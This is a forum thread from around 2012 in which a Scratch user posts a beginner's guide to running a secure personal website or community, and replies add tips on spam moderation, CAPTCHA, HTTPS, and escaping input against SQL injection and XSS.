Pages: 1 2
The small steps on how to secure your online site or community
A guide by LS97
Once you get into computers and programming, sometimes just visiting sites isn’t enough. Making your own site becomes a fun and useful alternative. This often turns out to be very productive, educational and satisfying. However, there are some really useful key points that you want to keep in mind while creating your online community.
Passwords, passwords, passwords…
First of all, you need a good password. This keeps on coming up everywhere, from school email accounts to game registrations, and it’s a must. It is extremely important to get a strong password and keep it safe. Nobody needs to know it, and it has to be hard to guess but easy to remember.
Choosing the tools
Second, think about the purpose of your site. What will people use it for? Who will use it? How? If the site is meant to promote a product and give more information about it, it’s better to use an online site maker such as Weebly. In general, these popular online site makers are better to use for this kind of site because they are more secure. Try to avoid site makers with advertisements because they can contain viruses or inappropriate content that you can’t control.
If you want to make an online community with user-moderated forums, uploads, or chats, the story gets a bit more complicated. You need to start from a blank file in notepad, and there are a lot of security precautions to take.
Before you even start, you have to know the basics of whatever programming language you’ll use (commonly PHP). Trust me, it helps.
I’ve got the power!
As much as your own passwords are important, so are the passwords and information about other users. Make sure that all of the user’s information is stored safely on the server and is encrypted. Also store the users’ IP address in a database so that you can ban them if they do anything wrong.
Moderation is another important aspect of online communities. Any user-submitted content (forums, chats, messages, comments, blogs) must have a word filter/censor in place! Also, check the content regularly to make sure no bad pictures are posted. Private chats are dodgy because they can’t be moderated, so avoid them.
You might get excited about being able to control other users: don’t abuse of your power. It’s never a good idea to allow many people to moderate your site. You will manage just fine with yourself alone as a moderator. If your site gets very popular you can maybe add a second power-person. I wouldn’t have more than that because things will get difficult to manage.
Spam time!
Spam has become so popular that even the most secure sites nowadays are occasional victims of this senseless practice. On your forums, try to implement a system similar to the one on the Scratch website. When a user registers, give them partial abilities until you know you can trust them.
As much as the 60 second rule is annoying, it helps so much in reducing spam I can’t even describe it. Being a nice guy and removing the rule from your site will probably earn you hours of spam-removal.
The time rule doesn’t only have to apply to forums. Uploads can be a big problem to remove if you don’t have the good tools, so prevention is the key. Add a 5 minute delay between uploads and you’ll be fine.
Just in case spam does happen, and it’s inappropriate, think of an easy method to quickly remove it or hide it from view, until you took care of it completely. You don’t want a bunch of people seeing stuff they don’t want to see.
Verification of Scratchers – Not everyone is who they say they are…
On the internet it’s really easy to pretend you’re someone other than who you really are. Some bad people might pretend to be a known Scratcher and apply for admin on your site under that fake username. To avoid this happening, first ask the user to post a comment on your Scratch projects with that account name. If they don’t, there’s a good chance they’re some kind of bad guy.
The Happy Ending
Once you think you’re following these rules and feel good about your site’s security, you can go ahead and publish it. Run it through to the Scratch Team to see if it’s acceptable to advertise on the Scratch Forums. If you’re lucky, you’ll see your site grow from a bunch of code to a wonderful community.
Have fun making your own site!
Last edited by scimonster (2012-05-21 14:01:52)
Offline
Very good!
Offline
Some good advice there, LS97! Unlike so many website guides, this focuses less on the code and more about how to run the site, something plenty of Scratchers here with their own sites should read and take on board!
Offline
Useful, and informative. Indeed good advice.
Offline
Great information. Apparently P2S like it too. Check the announcement about user-created sites!
Offline
Nice advice! I read through it, and it's pretty good. Here are some ideas I came up with:
When a user submits a comment, it will go through moderation before the comment can be posted. This will definitely prevent spam.
Download a program that is constantly checking the website for spam. Have some antivirus just in case.
Be nice.
That's all I could think of.
Offline
Putting posts through moderation before allowing users to see the post is certainly a way to stop spam but it can seriously frustrate users if they have to wait 24hrs or so for their post to appear. It can also cause a lot of grief for mods if there are a lot of posts. In my opinion, it is better to supply a report button on each post and allow each post to appear UNTIL it is flagged. Not quite as safe as your suggestion but much more implement-able. Have your mods skim through the site keeping an eye out and there should be no problems. What I have for the in-progress block library site is a moderator page that lists all posts that have not yet been confirmed as spam or not spam and allows them to see and categorise each post properly from one page.
Offline
usefull info! thanks!
Offline
Ask yourself before creating the website: why are you creating it? And for what purpose it will serve. Keeping those two things in mind will help you with how to deal with different situations. Great guide!
Offline
GREAT guide!
Offline
Thanks for the time you took to write this up LS97!
Offline
Something should probably be said on here about SQL Injection and XSS prevention as well
Offline
SJRCS_011 wrote:
Something should probably be said on here about SQL Injection and XSS prevention as well
Essentially, remember to escape all user input (don't trust any of it) with mysql_real_escape_string($string); (on php at least) and for preventing xss remember to escape all html characters (htmlspecialchars($string)) and other precautions.
XSS (Cross Site Scripting) Prevention Cheat Sheet
SQL Injection Prevention Cheat Sheet
Last edited by rookwood101 (2012-05-20 04:56:29)
Offline
SJRCS_011 wrote:
Something should probably be said on here about SQL Injection and XSS prevention as well
This guide is more focused around the principles behind it, rather than the specific codes or workaround prevention. I assumed that if you know how to code, you know how easy it is to inject scripts onto badly-protected pages
Offline
Enjoy the new status of ITopic.
Offline
scimonster wrote:
Enjoy the new status of ITopic.
Gee, thank you
Offline
LS97 wrote:
SJRCS_011 wrote:
Something should probably be said on here about SQL Injection and XSS prevention as well
This guide is more focused around the principles behind it, rather than the specific codes or workaround prevention. I assumed that if you know how to code, you know how easy it is to inject scripts onto badly-protected pages
Precisely why you should mention something about it. Now that almost everyone on Scratch has some sort of a website (forums are relatively safe, but still), and that they are required to view this, they should know what they're up against.
As you said, any programmer with two brain cells to rub together could eventually figure out how to get through an unprotected site.
Offline
I still haven't even put anti-spam protection on my site. I will eventually.
You could also tell them to use COPTCHA or send an automated email to them, to see if they are a computer or human.
And, for security if their host allow them to, tell them to use SSL and HTTPS wherever possisble.
Offline
Great guide. When is the next version of Bingo coming out?
Offline
Richard2000 wrote:
Great guide. When is the next version of Bingo coming out?
Thanks!
I have to admit this might be slightly off-topic, so next time maybe post a comment on one of my projects so as not to disturb the forums, but:
I'm working hard on Bingo 2.0 mainly on adding more complete features and fixing many bugs, instead of adding new blocks (albeit still having added a dozen). However my aim is to provide more functionality with the blocks that I currently have by adding intuitive features and more possibilities of adding different arguments.
Two major changes in 2.0, one in the field of programming and one feature, are data types and a brand new mod share browser inside the program.
I do not have an estimated release date, but I don't expect it to be finished before September as I'm going on holiday soon.
Offline
Bumpity bump! Bump!
Offline
Pages: 1 2